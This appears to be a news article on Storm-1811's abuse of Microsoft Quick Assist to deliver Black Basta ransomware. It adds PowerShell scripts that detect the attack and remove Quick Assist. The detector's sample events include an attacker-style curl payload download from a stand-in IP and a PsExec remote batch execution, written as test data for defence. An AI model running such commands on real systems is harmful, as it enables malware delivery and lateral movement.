
Cybercriminals use Microsoft’s Quick Assist feature in ransomware attacks

May 16, 2024 | Newsroom | Ransomware / Incident Response

The Microsoft Threat Intelligence team said it has observed a threat actor it tracks under the name Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks.

“Storm-1811 is a financially motivated cybercriminal group known to use the Black Basta ransomware,” the company said in a report published on May 15, 2024.

The attack chain involves impersonation through voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the delivery of QakBot, Cobalt Strike and, ultimately, Black Basta ransomware.

“Threat actors abuse Quick Assist features to conduct social engineering attacks, for example by impersonating a trusted contact such as Microsoft technical support or an IT professional at the target user’s company to gain initial access to a target device,” said the tech giant.


Quick Assist is a legitimate application from Microsoft that allows users to share their Windows or macOS device with another person via a remote connection, primarily with the intention of troubleshooting technical issues on their systems. It is installed by default on devices running Windows 11.

To make the attacks more convincing, the threat actors first carry out link listing attacks, a type of email bombing in which the targeted email addresses are signed up to various legitimate email subscription services so that the victims' inboxes are flooded with subscription content.

The attacker then calls the target user while impersonating the company's IT support team, offers to help fix the spam problem, and asks the user to grant access to their device via Quick Assist.

“Once the user allows access and control, the threat actor executes a scripted cURL command to download a series of batch files or ZIP files that are used to deliver malicious payloads,” the Windows maker said.

“Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware across the network.”
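The two artifacts quoted above, a scripted cURL download of batch or ZIP files during a Quick Assist session and a later PsExec deployment, can be hunted for in process-creation telemetry. The PowerShell below is an added example and is not code from Microsoft's or Rapid7's reports. The event records are constructed for illustration in the shape of Sysmon Event ID 1 fields; the Quick Assist image path, the 203.0.113.10 address, the host and user names, and the 120-minute correlation window are assumptions.

```powershell
# Added example (not from the Microsoft or Rapid7 reports): flag curl downloads of
# .bat/.zip files and PsExec activity, and raise severity when the same host
# launched Quick Assist shortly before. Field names follow Sysmon Event ID 1;
# map them to your own pipeline (Get-WinEvent, SIEM export) as needed.

function Find-QuickAssistAbuse {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 120   # assumed correlation window
    )

    # Quick Assist launches, used to correlate later events on the same host.
    # Commands run during a session come from the user's own desktop (explorer.exe,
    # cmd.exe), so a parent-process check alone would not catch them.
    $qaStarts = $Events | Where-Object { $_.Image -match '\\quickassist\.exe$' }

    foreach ($e in $Events) {
        $reason = $null
        if ($e.Image -match '\\curl\.exe$' -and
            $e.CommandLine -match 'https?://' -and
            $e.CommandLine -match '\.(bat|zip)(\s|$)') {
            $reason = 'curl download of .bat/.zip payload'
        }
        elseif ($e.Image -match '\\psexe(c|c64|svc)\.exe$') {
            $reason = 'PsExec client or PSEXESVC service process'
        }
        if (-not $reason) { continue }

        $t = [datetimeoffset]::Parse($e.Time)
        $recentQA = @($qaStarts | Where-Object {
            $_.Computer -eq $e.Computer -and
            ($t - [datetimeoffset]::Parse($_.Time)).TotalMinutes -ge 0 -and
            ($t - [datetimeoffset]::Parse($_.Time)).TotalMinutes -le $WindowMinutes
        })

        [pscustomobject]@{
            Time        = $e.Time
            Computer    = $e.Computer
            User        = $e.User
            Severity    = $(if ($recentQA.Count -gt 0) { 'high' } else { 'medium' })
            Reason      = $reason
            CommandLine = $e.CommandLine
        }
    }
}

# Constructed sample events (not real telemetry). The Quick Assist path is shortened.
$events = @(
    [pscustomobject]@{ Time='2024-05-10T14:02:11Z'; Computer='WS-0419'; User='CORP\jdoe'
        Image='C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_x64\QuickAssist.exe'
        CommandLine='QuickAssist.exe'; ParentImage='C:\Windows\explorer.exe' },
    [pscustomobject]@{ Time='2024-05-10T14:09:47Z'; Computer='WS-0419'; User='CORP\jdoe'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -o C:\Users\Public\update.zip http://203.0.113.10/qa/update.zip'
        ParentImage='C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Time='2024-05-10T15:30:02Z'; Computer='WS-0419'; User='CORP\jdoe'
        Image='C:\Users\Public\psexec.exe'
        CommandLine='psexec.exe \\FS-01 -accepteula -s cmd.exe /c C:\Temp\run.bat'
        ParentImage='C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Time='2024-05-10T14:15:00Z'; Computer='DEV-07'; User='CORP\build'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -s https://intranet.example/api/health'
        ParentImage='C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Time='2024-05-10T09:00:00Z'; Computer='BUILD-02'; User='CORP\build'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -o C:\build\tools.zip https://intranet.example/tools.zip'
        ParentImage='C:\ci\runner.exe' }
)

# Expected: the WS-0419 curl and psexec events come back as 'high' (Quick Assist
# launched on that host within the window), the BUILD-02 download as 'medium',
# and the DEV-07 health check is not flagged at all.
Find-QuickAssistAbuse -Events $events | Format-Table -AutoSize
```

The correlation is by host and time rather than by parent process because, during a Quick Assist session, the helper drives the victim's desktop and any command runs under the victim's own interactive session. Expect some medium-severity noise from legitimate curl downloads on build hosts; the high-severity tier is the one worth paging on.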

Microsoft said it is taking a close look at the misuse of Quick Assist in these attacks and is working to integrate alerts into the software to notify users of possible tech support scams that could facilitate the spread of ransomware.

The campaign, believed to have begun in mid-April 2024, targets a wide range of industries and sectors, including manufacturing, construction, food and beverage, and transportation, Rapid7 said, noting the opportunistic nature of the attacks.

“The low barrier to entry to carrying out these attacks, coupled with the significant impact these attacks have on their victims, continues to make ransomware a very effective means to an end for threat actors looking to make a profit,” Robert Knapp, senior manager of incident response services at Rapid7, said in a statement shared with The Hacker News.


Microsoft has also described Black Basta as a “closed ransomware offering,” as opposed to a ransomware-as-a-service (RaaS) operation that relies on a network of core developers, affiliates and initial access brokers to carry out ransomware and extortion attacks.

It is “spread by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure and malware development,” the company said.

“Since Black Basta first emerged in April 2022, Black Basta attackers have deployed the ransomware after gaining access from QakBot and other malware distributors.”

Organizations are advised to block or uninstall Quick Assist and similar remote monitoring and management tools when they are not in use, and to train employees to recognize tech support scams.
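One way to act on the uninstall recommendation on a Windows 11 host, as an added example rather than guidance taken from the Microsoft or Rapid7 reports: Quick Assist ships either as a Windows capability (App.Support.QuickAssist) or, on newer builds, as a Store (MSIX) package (MicrosoftCorporationII.QuickAssist), so both packagings are checked and removed, and the result is verified afterwards. Run it from an elevated PowerShell session; the function name is assumed.

```powershell
# Added example (not from the Microsoft or Rapid7 reports): remove Quick Assist
# from a Windows 11 host and verify that it is gone. Supports -WhatIf.

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    # 1. Feature-on-demand packaging (Windows 10 and early Windows 11 builds).
    $caps = Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' }
    foreach ($c in $caps) {
        if ($PSCmdlet.ShouldProcess($c.Name, 'Remove-WindowsCapability')) {
            Remove-WindowsCapability -Online -Name $c.Name | Out-Null
        }
    }

    # 2. Store (MSIX) packaging: remove for every existing user profile.
    $pkgs = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
    foreach ($p in $pkgs) {
        if ($PSCmdlet.ShouldProcess($p.PackageFullName, 'Remove-AppxPackage')) {
            Remove-AppxPackage -AllUsers -Package $p.PackageFullName
        }
    }

    # 3. Also drop the provisioned copy so it is not re-installed for new users.
    $prov = Get-AppxProvisionedPackage -Online |
        Where-Object { $_.DisplayName -eq 'MicrosoftCorporationII.QuickAssist' }
    foreach ($q in $prov) {
        if ($PSCmdlet.ShouldProcess($q.PackageName, 'Remove-AppxProvisionedPackage')) {
            Remove-AppxProvisionedPackage -Online -PackageName $q.PackageName | Out-Null
        }
    }

    # 4. Verify: both inventories should now be empty.
    $left = @(Get-WindowsCapability -Online |
                  Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' }) +
            @(Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue)
    if ($left.Count -eq 0) {
        Write-Output 'Quick Assist is not installed.'
    } else {
        Write-Warning "Quick Assist still present: $($left.Name -join ', ')"
    }
}

Remove-QuickAssist -WhatIf   # dry run; drop -WhatIf to apply
```

Removal is a blunt tool; if the help desk genuinely relies on Quick Assist, an alternative is to keep it installed but restrict who can launch it through AppLocker or Windows Defender Application Control, and to pair that with the user training the article recommends, since the initial access here is a phone call rather than an exploit.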
